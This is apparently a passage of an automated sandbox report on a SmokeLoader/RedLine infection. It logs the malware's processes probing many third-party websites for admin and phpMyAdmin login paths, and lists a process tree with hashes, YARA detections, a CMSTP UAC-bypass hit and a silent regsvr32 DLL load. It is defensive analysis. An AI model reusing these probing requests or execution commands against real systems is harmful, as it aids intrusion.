Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:13 UTC  1252               IN         Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JC56c_3j_Un1mQkH6s2o8Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:13 UTC  397                IN         Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:13 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
250         192.168.2.6  49699        44.199.96.179   443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  180                OUT        GET /admin.php HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  197                IN         HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
Content-Length: 7358
Connection: close
Server: nginx/1.12.2
Vary: Accept-Encoding
ETag: "5df8f9a3-1cbe"
2024-02-05 11:16:13 UTC  7358               IN         Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
251         192.168.2.6  50122        45.60.0.44      443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  407                OUT        GET /pma/ HTTP/1.1
Host: m.codere.com.co
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  354                IN         HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains
Date: Mon, 05 Feb 2024 11:16:12 GMT
Connection: close
Content-Length: 1245
X-CDN: Imperva
X-Iinfo: 3-31484936-31484965 NNNY CT(118 135 0) RT(1707131773054 398) q(0 0 0 -1) r(0 1) U24
2024-02-05 11:16:13 UTC  1098               IN         Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
2024-02-05 11:16:13 UTC  147                IN         Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
252 | 192.168.2.6 | 50147 | 44.195.133.145 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 327 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 1164 | IN | HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=332FB88B45E9EB81F6BACCCF705B366D; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142573,id:BACE518A0254BE88AEC72401327C324F,signature:4f85f8d832ff8973a5a17f3db3b432844edbd28973253f045f40ac3433431bb2,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:6b7d414b-c187-45ec-8d36-7837b2db00f2; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-251-41.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
253 | 192.168.2.6 | 49726 | 172.67.170.147 | 443 | 4632 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:14 UTC | 576 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjkoOWZ0aBem6AH8WAvzXc0h0iQESsyVcAZb4EUccLIMLZ8JpcnIj3yJnBkU5bOcsc9jo0diWOiBMvwxCWdyez%2FiJ2zMW17Bx7JXW24%2BS130hrnklGaCarHdJbE1S%2B927QigFvX1iYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd71ead2678b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:14 UTC  168  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
2024-02-05 11:16:14 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
254         192.168.2.6  49689        3.161.150.69    443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  180  OUT  GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:14 UTC  2006  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-vONTvDDlfmHoPD9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: vwkqfs6A3ra1GuWD7jumUwQvjZKkyh_pHCMBRKhB-rAiIRhUbZ_2wQ==
2024-02-05 11:16:14 UTC  14378  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:16:14 UTC  7574  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Martin"},{"country_code":"mg","prefix":"+261","name":"Madagascar"},{"prefix":"+692","country_code":"mh","name":"Marshall Islands"},{"country_code":"mk","prefix":"+389","name":"North Macedonia"},{"name":"Mali","country_code":"ml","prefix":"+223"},{"prefix"
2024-02-05 11:16:14 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
255         192.168.2.6  49375        202.81.112.32   443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  184  OUT  GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:14 UTC  124  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
256         192.168.2.6  49747        3.134.125.175   443               4328  C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  249  OUT  GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
2024-02-05 11:16:13 UTC  249  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 6f775cd5dd0c092eb62fa3f5c7333771
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-02-05 11:16:13 UTC  937  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f



                                                                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                                                                Start time:12:11:51
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                                                                                Start time:12:11:57
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:18
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\rghwvve
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\rghwvve
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:20
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x110000
File size:5'911'640 bytes
MD5 hash:E88E0FE2BB602D639E5658C42F34AF2F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 50%, ReversingLabs
Reputation:low
Has exited:true

Target ID:8
Start time:12:12:22
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\572.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\572.exe
Imagebase:0x400000
File size:1'998'848 bytes
MD5 hash:151E9EC4F0355D2F131B871671BD5E20
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:9
Start time:12:12:22
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\572.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\572.exe
Imagebase:0x400000
File size:1'998'848 bytes
MD5 hash:151E9EC4F0355D2F131B871671BD5E20
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:10
Start time:12:12:23
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\93B.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\93B.exe
Imagebase:0x400000
File size:431'104 bytes
MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 87%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:12
Start time:12:12:25
Start date:05/02/2024
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
Imagebase:0x7ff734620000
File size:25'088 bytes
MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:14
Start time:12:12:25
Start date:05/02/2024
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: /s C:\Users\user\AppData\Local\Temp\1199.dll
Imagebase:0x210000
File size:20'992 bytes
MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:16
Start time:12:12:26
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\93B.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\93B.exe"
Imagebase:0x400000
File size:431'104 bytes
MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:moderate
Has exited:true

Target ID:17
Start time:12:12:28
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\1EB9.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\1EB9.exe
Imagebase:0x400000
File size:7'668'707 bytes
MD5 hash:82BEB2A060E63C9C9A26663D0103FAE6
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 8%, ReversingLabs
Reputation:low
Has exited:false

Target ID:18
Start time:12:12:29
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
Imagebase:0x400000
File size:709'120 bytes
MD5 hash:B0292A40F16BC3D5A1FE839FAC1C825A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation:low
Has exited:false

Target ID:20
Start time:12:12:30
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\1EB9.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
Imagebase:0x400000
File size:7'668'707 bytes
MD5 hash:82BEB2A060E63C9C9A26663D0103FAE6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:12:12:31
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
Wow64 process (32bit):true
